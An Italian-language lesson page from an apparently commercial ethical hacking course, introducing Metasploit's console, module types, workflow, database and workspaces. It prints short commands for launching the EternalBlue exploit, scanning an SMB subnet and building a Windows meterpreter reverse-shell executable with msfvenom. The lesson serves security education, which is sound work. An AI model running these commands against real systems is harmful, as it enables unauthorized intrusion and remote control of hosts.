0Pricing
Ethical Hacking Academy · Lezione

Architettura di Metasploit

Moduli e console

Architettura di Metasploit è una lezione Ethical Hacking Academy gratuita su CoddyKit. Questa è la lezione 1 di 4. Puoi leggere la lezione completa qui gratuitamente — poi esercitati direttamente nel browser con un editor di codice integrato e un tutor IA disponibile 24/7. Fa parte del percorso di apprendimento Ethical Hacking Academy, e i tuoi progressi si sincronizzano tra il web e l'app CoddyKit. Il corso Ethical Hacking Academy include 4 lezioni in totale.

Che cos'è Metasploit?

Metasploit è il framework per l'exploitation più utilizzato. Fornisce una libreria strutturata di exploit, payload e strumenti per verificare e dimostrare le vulnerabilità durante attività autorizzate.

Anziché scrivere ogni attacco da zero, può caricare moduli già collaudati, configurarli ed eseguirli tramite un'interfaccia coerente.

msfconsole

L'interfaccia principale è msfconsole, una shell interattiva a riga di comando. Offre il completamento tramite tabulazione, la cronologia dei comandi e l'accesso a ogni modulo.

La avvia da un terminale e poi lavora interamente all'interno del suo prompt.

msfconsole
# msf6 > help

Tipi di moduli

Metasploit organizza le funzionalità in tipi di moduli:

  • exploit: codice che sfrutta una vulnerabilità.
  • payload: codice eseguito sul bersaglio dopo lo sfruttamento.
  • auxiliary: scanner, fuzzer e strumenti che non distribuiscono un payload.
  • post: azioni successive allo sfruttamento su un host compromesso.
  • encoder e nop: aiutano i payload a eludere il rilevamento.

Denominazione dei moduli

I moduli utilizzano un percorso gerarchico che indica esattamente la loro funzione. Leggendo il percorso è possibile riconoscere il tipo, la piattaforma e il servizio bersaglio.

exploit/windows/smb/ms17_010_eternalblue
# type / platform / service / specific exploit

Exploit e payload a confronto

È importante distinguere tra:

  • L'exploit è il modo per entrare; compromette il software vulnerabile.
  • Il payload è ciò che si vuole fare una volta entrati, ad esempio aprire una shell.

Vengono abbinati: un singolo exploit può distribuire molti payload diversi a seconda dell'obiettivo e del bersaglio.

Il flusso di lavoro dei moduli

L'utilizzo di qualsiasi modulo segue un ciclo ripetibile:

  • fare search per trovare un modulo.
  • usare use per caricarlo.
  • impostare le options, come RHOSTS e LHOST.
  • eseguirlo con run o exploit.

Questa coerenza permette al framework di operare su migliaia di moduli.

use exploit/windows/smb/ms17_010_eternalblue
show options
set RHOSTS 10.10.10.5
exploit

Archivio dati e opzioni

Le impostazioni dei moduli risiedono nel datastore. Ogni opzione può essere obbligatoria o facoltativa.

  • RHOSTS: indirizzo o indirizzi del bersaglio remoto.
  • RPORT: porta remota.
  • LHOST: indirizzo in ascolto per le connessioni inverse.
  • LPORT: porta in ascolto.

Utilizzi show options per verificare ciò di cui un modulo ha bisogno prima di eseguirlo.

Il database

Metasploit si integra con un database PostgreSQL per memorizzare host, servizi, dati acquisiti e credenziali individuati durante un'attività. Questo consente di gestire in modo efficiente un ambito di analisi ampio.

Lo avvii prima di lanciare la console, così i risultati verranno registrati automaticamente.

msfdb init
# Inside msfconsole:
# db_status   hosts   services   creds

Moduli ausiliari

I moduli auxiliary svolgono attività utili senza eseguire exploitation: scansione delle porte, enumerazione dei servizi, brute force degli accessi e fuzzing.

Spesso costituiscono il primo passo, perché raccolgono le informazioni necessarie prima di selezionare un exploit.

use auxiliary/scanner/smb/smb_version
set RHOSTS 10.10.10.0/24
run

msfvenom

msfvenom è uno strumento complementare per generare payload autonomi sotto forma di file: eseguibili, script o shellcode da distribuire al di fuori della console.

Combina la generazione e la codifica dei payload in un unico comando, risultando utile per simulazioni di phishing o distribuzioni personalizzate durante test autorizzati.

msfvenom -p windows/meterpreter/reverse_tcp \
  LHOST=10.10.14.2 LPORT=4444 -f exe -o shell.exe

Workspace

Per attività multiple, i workspace di Metasploit mantengono separati nel database gli host, i servizi e i dati acquisiti di ogni cliente. Può passare da uno all'altro, evitando che i dati confluiscano tra valutazioni diverse.

workspace -a clientA      # add a workspace
workspace clientA         # switch to it
workspace                 # list all

Verifica rapida

Verifichi la sua comprensione dei tipi di moduli.

Riepilogo

Ha imparato l'architettura di Metasploit:

  • msfconsole è l'interfaccia principale; msfvenom crea payload autonomi.
  • Tipi di moduli: exploit, payload, auxiliary, post, encoder/nop.
  • I percorsi dei moduli codificano tipo, piattaforma e servizio.
  • Flusso di lavoro: search, use, set options, run; le impostazioni risiedono nel datastore.
  • Il database PostgreSQL tiene traccia di host, servizi e dati acquisiti.

Prossimo argomento: cercare e utilizzare gli exploit in modo efficace.

Domande Frequenti

La lezione «Architettura di Metasploit» è gratuita?

Sì — il testo completo di «Architettura di Metasploit» è gratuito qui sul web. Per esercitarvi in modo interattivo (un editor di codice integrato e un tutor IA 24/7) e sbloccare il resto del corso Ethical Hacking Academy, passa a CoddyKit PRO. Il corso Ethical Hacking Academy include 4 lezioni in totale.

Cosa imparerò in «Architettura di Metasploit»?

Moduli e console Eserciti Ethical Hacking Academy con codice pratico che esegui direttamente nel browser, e un tutor IA 24/7 risponde alle tue domande mentre lavori sulla lezione.

Ho bisogno di esperienza per iniziare Ethical Hacking Academy?

Non è richiesta alcuna esperienza precedente. Ethical Hacking Academy su CoddyKit è strutturato per principianti e studenti avanzati, quindi puoi iniziare da qui o dall'inizio e procedere al tuo ritmo. Questa è la lezione 1 di 4.

Quanto tempo richiede la lezione «Architettura di Metasploit»?

La maggior parte delle lezioni CoddyKit richiede circa 5–10 minuti. Ogni lezione è breve e interattiva, quindi fai progressi costanti e riprendi esattamente da dove hai lasciato su web e app.

Posso scrivere ed eseguire codice in questa lezione Ethical Hacking Academy?

Sì. Ogni lezione Ethical Hacking Academy include un editor di codice integrato, quindi scrivi ed esegui codice reale direttamente nel tuo browser e ricevi feedback istantaneo dall'IA — nessuna configurazione locale necessaria.

Tutte le lezioni di questo corso

  1. Architettura di Metasploit
  2. Ricerca e uso degli exploit
  3. Payload e Meterpreter
  4. Moduli post-exploitation
← Torna a Ethical Hacking Academy